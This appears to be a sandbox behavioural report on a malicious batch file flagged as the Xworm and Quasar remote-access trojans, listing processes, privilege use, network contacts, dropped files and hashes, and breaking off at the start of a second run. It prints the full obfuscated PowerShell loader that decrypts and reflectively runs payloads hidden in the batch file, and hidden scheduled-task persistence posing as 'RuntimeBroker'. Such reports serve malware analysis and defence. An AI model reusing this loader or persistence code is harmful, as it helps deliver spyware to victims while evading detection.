memory/3076-98-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-110-0x000001745DA50000-0x000001745DB82000-memory.dmp

memory/3076-111-0x000001745DBB0000-0x000001745DED4000-memory.dmp

memory/3076-112-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-113-0x000001745E230000-0x000001745E280000-memory.dmp

memory/3076-114-0x000001745E340000-0x000001745E3F2000-memory.dmp

memory/3076-115-0x000001745EE70000-0x000001745F032000-memory.dmp

memory/3076-116-0x000001745E200000-0x000001745E212000-memory.dmp

memory/3076-117-0x000001745E2C0000-0x000001745E2FC000-memory.dmp

memory/4068-118-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-120-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/4068-119-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/3076-121-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/3076-122-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-123-0x0000017441700000-0x0000017441710000-memory.dmp

memory/3076-124-0x0000017441700000-0x0000017441710000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win11-20240412-en

Max time kernel

41s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1752 wrote to memory of 4828 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 4332 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4828 wrote to memory of 3964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4828 wrote to memory of 3964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3964 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3964 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 964 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 964 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3508 wrote to memory of 920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3508 wrote to memory of 920 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 920 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 920 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 3868 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 4708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2864 wrote to memory of 4708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4708 wrote to memory of 4572 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4708 wrote to memory of 4572 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4572 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 4052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_750_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_750.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_750.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_750.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_750.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_750.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_462_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_462.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_462.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_462.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_462.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_462.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 147.185.221.19:27030 china-earth.gl.at.ply.gg tcp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 147.185.221.19:27030 china-earth.gl.at.ply.gg tcp
DE 195.201.57.90:443 ipwho.is tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bof1uym4.45m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4828-8-0x0000021C75840000-0x0000021C75862000-memory.dmp

memory/4828-9-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4828-10-0x0000021C75700000-0x0000021C75710000-memory.dmp

memory/4828-11-0x0000021C75700000-0x0000021C75710000-memory.dmp

memory/4828-12-0x0000021C75830000-0x0000021C75838000-memory.dmp

memory/4828-13-0x0000021C75AE0000-0x0000021C75C82000-memory.dmp

memory/4332-15-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4332-16-0x0000025865B50000-0x0000025865B60000-memory.dmp

memory/4332-17-0x0000025865B50000-0x0000025865B60000-memory.dmp

memory/4332-26-0x0000025865B50000-0x0000025865B60000-memory.dmp

memory/4332-29-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eb15ee5741b379245ca8549cb0d4ecf8
SHA1 3555273945abda3402674aea7a4bff65eb71a783
SHA256 b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA512 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\startup_str_750.vbs

MD5 5b5871d2529094b78a49750b45ea5f47
SHA1 c16477f999f91c6fca245bc44960b08e5bab7cc5
SHA256 4ec3b80d570e07948ea72aecb87d80bf4805d1c32ec1737ea00f1b6ad8adeb9c
SHA512 b657829cd2d72cddd71e5603b15baa3b86c77fbd65ea50fb65d06f900d5ed272a922084235861ac4260f72f2f682909af997e7142110801349798dbf41849733

C:\Users\Admin\AppData\Roaming\startup_str_750.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

memory/3508-46-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/3508-48-0x000001AA2D240000-0x000001AA2D250000-memory.dmp

memory/3508-49-0x000001AA2D240000-0x000001AA2D250000-memory.dmp

memory/4828-50-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/3508-53-0x000001AA2D550000-0x000001AA2D55E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

memory/2864-65-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/2864-66-0x00000237BA420000-0x00000237BA430000-memory.dmp

memory/2864-67-0x00000237D4770000-0x00000237D4778000-memory.dmp

memory/2864-68-0x00000237D4780000-0x00000237D48B2000-memory.dmp

memory/3868-78-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/3868-79-0x000001E0310B0000-0x000001E0310C0000-memory.dmp

memory/3868-80-0x000001E0310B0000-0x000001E0310C0000-memory.dmp

memory/3868-81-0x000001E0310B0000-0x000001E0310C0000-memory.dmp

memory/3868-83-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9665f44079e2ed28b3d426623291b219
SHA1 cc9ed0d8ffbb49e98034acca27f073b6db66032b
SHA256 6c8f1b0f7f78cbb20b1f0d8a41d80f47feb831ebb9ac64f3a868d3d124d4edfb
SHA512 86c4ed22bbaeeb12d53f547559d55121f5401bf3c830be67b7504b60e057d93ab88d65cbd59425e4be7fb5addc013a9115ec732afb101bf8500c438024ba1c0a

C:\Users\Admin\AppData\Roaming\startup_str_462.vbs

MD5 fbca8f20e020c40f9a96b1b8eec2ec45
SHA1 6aa4eb6de07215aa102e65e8fe94bec01b9faf5e
SHA256 6ed43ebd4b884bfb71fe6bb5022ca80da1e2697419b5e4cf9f9e2a1c5f1a3de5
SHA512 01d4a1f2eec871858504376f5764ce6135bf1b31e3edfe20f359568899984c6aecc13169a17873b74fdf72d0f825991c18a14133f0c65aaed9e3cbcc121b08f9

memory/4052-91-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4052-93-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/4052-92-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/3508-103-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4052-104-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/2864-105-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4052-106-0x000001F4696A0000-0x000001F4699C4000-memory.dmp

memory/4052-107-0x000001F46A400000-0x000001F46A450000-memory.dmp

memory/4052-108-0x000001F46A510000-0x000001F46A5C2000-memory.dmp

memory/4052-109-0x000001F46A7A0000-0x000001F46A962000-memory.dmp

memory/3508-110-0x000001AA2D240000-0x000001AA2D250000-memory.dmp

memory/4052-111-0x00007FFFAD2A0000-0x00007FFFADD62000-memory.dmp

memory/4052-113-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/4052-112-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/4052-114-0x000001F4692C0000-0x000001F4692D0000-memory.dmp

memory/4052-115-0x000001F469B50000-0x000001F469B62000-memory.dmp

memory/4052-116-0x000001F46A490000-0x000001F46A4CC000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win10-20240404-en

Max time kernel

69s

Max time network

76s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

